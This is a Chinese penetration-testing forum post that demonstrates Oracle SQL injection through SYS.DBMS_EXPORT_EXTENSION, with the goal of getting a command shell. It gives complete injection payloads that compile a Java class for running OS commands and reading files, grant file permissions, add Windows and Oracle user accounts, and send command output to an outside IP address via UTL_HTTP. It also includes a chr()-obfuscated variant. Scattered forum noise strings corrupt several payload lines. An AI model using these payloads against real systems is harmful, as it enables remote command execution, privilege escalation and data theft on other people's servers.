中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
$ ]/ Y& {" [9 T' ^$ r- D7 A$ A% A9 K0 A+ o' h! e
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) + ~- ]. v* p  j9 ^/ H9 R* o
的形式即可。(用" 'a'|| "是为了让语句返回true值) + {) G4 a4 ~' J
语句有点长,可能要用post提交。
- }2 I1 ]; Z% K1 F% B以下是各个步骤: # J2 ?9 E: _# i' R4 @" ?& S$ s8 ]2 i
1.创建包 ! E! P) [8 z9 d8 e
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
# e$ a) p! m0 G* A! p: }/xxx.jsp?id=1 and '1'<>'a'||( - J8 B3 }% G! e9 X" S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 p( }# N' `2 P8 K$ |
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
8 P9 |9 Y7 _$ R4 |new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
1 u5 E0 x+ h9 m+ w0 b}'''';END;'';END;--','SYS',0,'1',0) from dual
" U% p. S7 y2 U- d; \: `7 O)
5 x4 J6 w6 Z, H3 _# b( z: e7 F------------------------
# [+ U" J5 I5 ~) T# A如果url有长度限制,可以把readFile()函数块去掉,即:   v# K: I% P0 Q  T7 I6 m$ |
/xxx.jsp?id=1 and '1'<>'a'||(
* r5 L# u) M- bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' a* n7 _1 l' \/ u1 g5 @
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(- `5 r( E% L( V+ x
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}  E& {  z& q' A- i  V
}'''';END;'';END;--','SYS',0,'1',0) from dual
: A+ S+ j: q4 i) : m# O6 R. l& s* G0 i
同时把后面步骤 提到的 对readFile()的处理语句去掉。 " C$ l2 m1 d) l
------------------------------
3 Z) b+ Y. r( r3 i2.赋Java权限 ; Y. U4 X/ R4 d" r  {9 f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
8 m; f0 v) U8 T# @3.创建函数
# ^- n4 k6 H& W0 o; s% z5 xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% P" F3 D4 f9 N2 |7 z! o2 xcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual2 _' L' d1 ~5 ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: u4 s( t8 [4 G2 ?: u% }create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual! Y! N+ @3 Q+ u5 @+ I$ d+ d" k
4.赋public执行函数的权限 % W7 Q! h: ~! I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual% \! t5 P9 ]% z/ _8 A
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
$ H2 {7 Q. y+ A: j* z5.测试上面的几步是否成功
; N, {" x6 u& A( t# q+ _( W2 X! Aand '1'<>'11'||(
. `/ g; K) X2 y, v" `select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 0 R1 H& x6 _8 m7 E0 y9 [
)
) e+ D4 t# z" L; O+ G# o. m* Z: r7 ~) T* S. land '1'<>(
7 n2 W5 e% ]" Fselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
, M$ ?* i1 i% {4 y1 {# N$ f- x)
% U3 U5 H) }! Z6.执行命令: / n& i& ^. a& s! k) c# W; ^$ ?
/xxx.jsp?id=1 and '1'<>( $ D8 C. @1 M! @0 e5 ?
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual + z+ V  F" v, C1 j' ^6 k( `. a
  P6 m: ^! b& C
)
) D1 I4 x; a) ^8 Z$ u/xxx.jsp?id=1 and '1'<>( % \2 P( G1 U; Y; {' f; u% t; ~3 }/ o# _
select  sys.LinxReadFile('c:/boot.ini') from dual
7 L  K- ?+ ]) s4 K: j4 T: \: ?+ R6 M5 S+ R- K- x% z
)
% K. Z! w8 q3 A) Y4 u* Y/ K+ X2 _  
. {4 m2 F: M' G1 \注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
# l! c0 d( _, z+ }. x如果要查看运行结果可以用 union :
( s% T" a$ v8 V- u& A' P/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
5 V/ ?4 l3 ]( Y9 I或者UTL_HTTP.request(:
% M! I$ W  p7 a/xxx.jsp?id=1 and '1'<>( 9 [5 \+ N' V7 J2 {; R( m4 E' Z0 `
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
4 |% L% t' X4 {$ A)
! b, I1 d* Z, r; d/xxx.jsp?id=1 and '1'<>(
4 d4 N9 A6 W9 _2 J! V& FSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
7 W; @* J% w& G& A: g8 U% Q)
. w9 T8 `! |/ p/ {" A注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
7 ^/ d7 R2 z6 s% T- ?( @( l2 }--------------------
: Y/ T; A! y: e2 U, w6.内部变化 & D3 q! @. e. _7 \$ _% j
通过以下命令可以查看all_objects表达改变:
' G6 i( g1 O/ V3 _* {# Q* q* P' e& ?select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'" ]+ S, }+ {' r9 }
7.删除我们创建的函数
9 f1 p. M3 j& ^0 r6 Y4 Kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 O1 E; A8 O% Q$ Q/ ydrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
4 T. L' `5 X2 w6 B5 {; Q==================================================== " n5 g" ?' P* \( J% l+ g
全文结束。谨以此文赠与我的朋友。
# H6 f  x: x1 ]; S) j: llinx 6 Y  A0 b; d$ y4 C2 ^7 A1 o1 y
124829445 5 w7 ]3 c* H) |2 L( H- h- E
2008.1.12
; L( p- [" ~6 K2 F; ~0 ^0 nlinyujian@bjfu.edu.cn
% u& {- P( J6 X0 M8 d* E8 ^======================================================================
/ p5 g+ o0 R: V0 f0 L测试漏洞的另一方法: 4 @- e2 }' h  U! J
创建oracle帐号:
6 }; i) l7 Z' F6 i* T# Kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 }1 d0 |# B3 S! {CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual) ]$ B$ m1 p' X5 q; m4 X  a2 D
即: 9 ]- O6 l3 c" l" i# W% o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
# x7 ^, M, D% [) i  dchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
$ g# \5 ^7 D# ~确定漏洞存在:
" r2 s, D' E  |9 m8 @/ Y( a" _5 [, h4 h$ M1<>(
. t' B5 i& g" t( k9 c! V& E: [select user_id from all_users where username='LINXSQL' 5 @$ ^9 ^4 t. z1 B/ Z
)
5 i+ ]& `' f: T给linxsql连接权限: - q1 P0 ^' n2 a
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" {0 H0 P! r3 j' h- G6 l
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 8 a: C) r  e8 `6 g! r: ^0 R
删除帐号: 9 x* g# ]- W$ c4 j
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, N) Z  y/ w" }6 \! edrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
7 U) n, }7 I- ?9 [  V% J3 S. d====================== 1 _: H& a3 t0 X: q2 X  G
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:1 Q0 E* {$ H# a# p" u
1.jsp?id=1 and '1'<>( 2 p. i' |% I2 m! x
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 d. S& X8 F- `
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
( k" p* w! Z5 F+ I3 C) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE. U7 j$ n5 z  L4 C$ U: z' D( @( F
 ), n/ v7 K6 f) n3 n
8 U  I- B. X3 v5 M$ V3 p; z9 r% T
) N; y6 a$ _) \# F7 P" p# K% d, P3 C

7 D5 ]5 N% m. `



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2